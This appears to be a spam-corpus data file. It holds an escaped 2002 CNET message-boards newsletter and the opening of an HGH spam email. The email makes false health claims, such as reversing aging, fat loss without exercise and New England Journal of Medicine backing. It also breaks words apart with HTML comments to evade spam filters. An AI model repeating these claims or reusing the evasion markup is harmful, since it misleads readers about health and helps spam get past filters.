 				&lt;font color="#CC000" size="-2"&gt;94%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;6%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(2878 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZMiArtASOnO8CtmMg4R" &gt;Ad-aware&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: System Utilities&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;77%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;23%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(263 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgcNRKtD70VOf0m8P9eR" &gt;Guard-IE Ad Blocking Privacy Suite and Popup Killer&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: Online Privacy&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prSf1Y-hU6coezkBZXyR" &gt;&lt;b&gt;More User Opinions&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 				&lt;!-- /Hot Products --&gt;
 &lt;!--Tech24 promo--&gt;				
 &lt;TABLE WIDTH="136"  CELLSPACING="0" CELLPADDING="0" BORDER="0"&gt;
 &lt;TR&gt;&lt;td&gt;
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;b&gt;Computer Problems?&lt;/b&gt; Try our Live Support from a Live technician!&lt;/font&gt;&lt;/div&gt;
 &lt;/tR&gt;&lt;/td&gt;
 &lt;/table&gt;
 &lt;STYLE&gt;
 	.black {color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; font-size: 11px; font-weight: normal;}
 &lt;/STYLE&gt;
 &lt;SCRIPT LANGUAGE=javascript&gt;
 &lt;!--
 function clearTextarea() {
 	if ((document.QuestionEntry.Question.value == "Type here and click go.")) {
 		document.QuestionEntry.Question.value = "";
 	} else {
 		return;
 	}
 }
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;form method="post" action="http://www.tech24.com/process/QuestionRedirect.asp" name="QuestionEntry"&gt;
 &lt;input type="hidden" name="Partner" value="Tech24CNet"&gt;
 &lt;input type="hidden" name="Portal" value="Tech24CNet"&gt;
 &lt;TABLE WIDTH="130" BORDER="0" CELLSPACING="0" CELLPADDING="0" CLASS="black"&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/cn_01.gif" ALT="" WIDTH="130" HEIGHT="64" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="126" ALIGN="center" VALIGN="top" BGCOLOR="#F0F2E4" CLASS="black"&gt;
 		&lt;BR&gt;&lt;textarea name="Question" cols="11" rows="3" wrap="virtual" onFocus="clearTextarea()"&gt;Type here and click go.&lt;/textarea&gt;
 		&lt;BR&gt;&lt;BR&gt;&lt;input type=image src="http://www.tech24.com/images/go.gif" value=submit name=submit border=0&gt;
 		&lt;BR&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="126" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 		&lt;TD WIDTH="2" VALIGN="top" BGCOLOR="#000000"&gt;&lt;IMG SRC="http://www.tech24.com/images/transpar.gif" WIDTH="2" HEIGHT="1" ALT="" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD WIDTH="220" COLSPAN="3" VALIGN="top"&gt;&lt;IMG SRC="http://www.tech24.com/images/zc_04.gif" ALT="" WIDTH="130" HEIGHT="9" BORDER="0"&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- /Tech24 promo--&gt;				
 &lt;!-- promo section --&gt;				
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 						&lt;font size="-1"&gt;I'm sure you've seen those annoying X-10 cameras ads popping up left and right while surfing the Internet. One day, out of curiosity, I decided to check this bothersome company's Web site. To my amazement, I found that their miniature cameras are pretty darn tiny, and you can mount them practically anywhere. But what does the law says about using them? I wouldn't want anyone to invade my privacy with that sort of camera setup. Coincidentally, I ran across this interesting discussion about this in the Boards, where members were discussing these &lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KJgWw6CowXvsg9tyQFWvZR" &gt;miniature cameras&lt;/a&gt;, called CCTVs, and the privacy concerns around them. So if you want more info or would like to leave your two cents' worth about this, send us a post. Besides, this information might keep you from getting caught on camera in an embarrassing situation. 
  &lt;/font&gt;&lt;br&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=55 align=left&gt;
 						&lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Promos/mb_0503_pushpin_pg.gif" width="50" height="50" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 						&lt;/table&gt;
 						Lee Koo&lt;br&gt;
 						CNET Community&lt;br&gt;
 						Got suggestions? Email me: &lt;a href="mailto:messageboards@cnet.com"&gt;messageboards@cnet.com&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;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href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_ffQGvsIC1b2OB8OEuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTW-8XkTxhOmI_uIUEksR"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href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw7IMhWJaylIO7r3fxZR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jBYv85I81u0PT_Qv1dR"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href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQ9_xb2SM_svdGheo-cR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQIuxlESBL4r8dJx98lbKRR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMy_n5CiAv2Y9ZZvQKFR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM1EYfXXY_nhJiSUxuD-D9R" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZkrpZrKTtdaB0S22bbKAeR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePOUIIJanyG9TmIKJ15BRyR"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&lt;a name="ThisweekinCNETMessageBoards"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_thiswk.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;Cookie, anyone?&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;No, not the chocolate-chip type, but small data files that are written to your hard drive by some Web sites when you view them in your browser. So what are the benefits of cookies? Are they harmful? Can I get rid of them without messing up my computer? These and many other cookie questions are answered in these two discussions, so if you're curious, bite into it and find out more. 
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=78-d5asIdUkHp8KE5u5vnMUN5xspo4R" &gt;To delete or not to delete cookies...your choice&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyTogUvIiSupcptbPMuR" &gt;Deleting cookies and keeping them off my computer&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgGTY-D9R0CGk_HtsosR" &gt;More Computer Help discussions&lt;/a&gt;&lt;/ul&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5rm1qg0NpbnpTbdL3ZR" &gt;My browser home page gets hijacked every time!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Have you ever checked out a Web site only to find that the home page on your Internet browser had been hijacked by it and you can't change it back? This happened to one member. Fortunately for him, the expert advisor of the forums was there for his rescue. Take a look at how he and others solved the problem. &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0O79aGXCqa7qeZDozn6f5dR" &gt;More Computer Newbies discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk1PgLkwxdPhsYK3Awi9qcR" &gt;Pop-up ads, begone!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;If you've downloaded some software in the past and noticed an unreasonable amount of pop-up ads, you may have picked up unauthorized software that serves pop-up ads while you surf. This can be pretty frustrating and annoying. Find out here about these unauthorized attachments and how to get rid of nasty pop-up ads.
 &lt;ul&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwQkvTXPxTYYRGOT9_JmpRR" &gt;Removing Gator junk from my PC&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQaMc92V0QGftmZCtvxYhFR" &gt;More Security and Virus Alerts discussions&lt;/a&gt;
 &lt;/ul&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzIPycvY4HtR-pp7us2Qf9R" &gt;Digital vs. analog camcorders&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Getting ready for that long summer vacation in Tahiti? Want to buy a camcorder and capture the whole thing on videotape? When you need buying advice, what better place to turn than to the forums? You'll always find someone there with advice that'll make your experience a little easier. In this thread, a member wondered what type of camcorder would be the best for his needs, digital or analog. If you're in the market for a new camcorder or already have one and can offer some tips, take a look at this discussion and add your voice. &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIIbyDh1gmKNXLTSyPWc3uR" &gt;More Consumer Electronic &amp; Digital Camera discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;!-- Simple Question with Simple Answers--&gt;
 &lt;a name="SimpleQuestionswSimpleAnswers"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_qa.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWM83sWP9VA35c54JMlR" &gt;&lt;b&gt;Where's ScanDisk for Windows XP?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hThCnYGLN8S_eSgFWV4R" &gt;&lt;b&gt;Now that Audiogalaxy has gone, what next?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zF7G8oK_rjups7LLZ5eR" &gt;&lt;b&gt;Brand-new memory is missing/disappearing!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;!-- Help your fellow Boarders --&gt;
 &lt;a name="HelpyourfellowBoarders"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_hp.gif" width="290" height="19" border="0" alt="Help your fellow Boarders"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4BqAJjoO3Nt-tKChBwsR" &gt;&lt;b&gt;Should I convert to Windows XP?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Melinda Douch&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;&lt;li&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JMEHZt86DYlcGhVIlcU_ZR" &gt;&lt;b&gt;Cannot forward pictures in e-mail&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Mariann Eppolito&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NyUB_91PHq15ZNEEZuR" &gt;&lt;b&gt;A bunch of drive problems&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Darren Harris&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0101)file://\\Cnet2\marketing\Cartel\Inventory%20Hub\NL%20Bricks--Elsewhere\CNET\NLHorizontal_2.18.02.html --&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 
 NOSEND="1"&gt; &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; 
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
       &lt;UL&gt;
         &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live Tech Help. Submit your question now.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love. Over 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
   &lt;!-- End Horizontal Brick--&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=ca-icPurXg7C8Y-yTW-l1KogQlfhTfmldRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx2T2E9EfbQq-Kh1XhaZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-MvlKvuUJ5QddfWmTdR"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href="http://clickthru.online.com/Click?q=09-joDSIj8jskcuYs8LYSS7ZMgtY8cR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx9GNRtPqEsB8LE27qdRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJoLugUgz6yClxb-7XsFR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVs6qDN_Xl_kj2ZBSJu4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96npzeshsnStcVTQzciR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9P5lTviqT8UEE0WNrUZlR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e430&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=88-ecGP-fKmi5OeGT-qQXN9j6TAUdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,HGH Liquid!  Lose Weight...Gain Muscle...Affordable Youth!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 Hello, jm@neteze.com&lt;BR&gt;
 &lt;BR&gt;
 As se&lt;!--5--&gt;en on NB&lt;!--D--&gt;C, CBS, and CN&lt;!--H--&gt;N, and even Opr&lt;!--D--&gt;ah!  The health&lt;br&gt;
 discove&lt;!--F--&gt;ry that actually revers&lt;!--D--&gt;es aging while burning fat,&lt;br&gt;
 with&lt;!--boy--&gt;out dieti&lt;!--D--&gt;ng or exerc&lt;!--F--&gt;ise!  This pro&lt;!--A--&gt;ven discovery has even&lt;br&gt;
 been report&lt;!--jm--&gt;ed on by the Ne&lt;!--test--&gt;w Engl&lt;!----&gt;and Jour&lt;!--F--&gt;nal of Medi&lt;!--F--&gt;cine.&lt;br&gt;
 For&lt;!--jm--&gt;get aging and d&lt;!----&gt;ieting forever!  And it's Gua&lt;!--S--&gt;ranteed!&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 * Red&lt;!--lo--&gt;uce body fat and build lean muscle WIT&lt;!--jm--&gt;HOUT EXERCISE!&lt;br&gt;
 * Enha&lt;!--jm--&gt;ce se&lt;!--la--&gt;xual perf&lt;!--hehe--&gt;ormance&lt;br&gt;
 * Rem&lt;!--jm--&gt;ove wrinkles and cellulite&lt;br&gt;
 * Lower blood pres&lt;!--jm--&gt;sure and improve choles&lt;!----&gt;terol profile&lt;br&gt;
 * Imp&lt;!--jm--&gt;rove sleep, vision and me&lt;!----&gt;mory&lt;br&gt;
 * Resto&lt;!--jm--&gt;re hair color and gro&lt;!----&gt;wth&lt;br&gt;
 * Stren&lt;!--jm--&gt;gthen the immune sys&lt;!----&gt;tem&lt;br&gt;
 * Incre&lt;!--jm--&gt;ase ener&lt;!----&gt;gy and card&lt;!----&gt;iac output&lt;br&gt;
 * Turn bac&lt;!--jm--&gt;k your body's biol&lt;!----&gt;ogical time cl&lt;!----&gt;ock 10-20 years&lt;br&gt;
 in 6 months of usage !!!&lt;br&gt;&lt;br&gt;
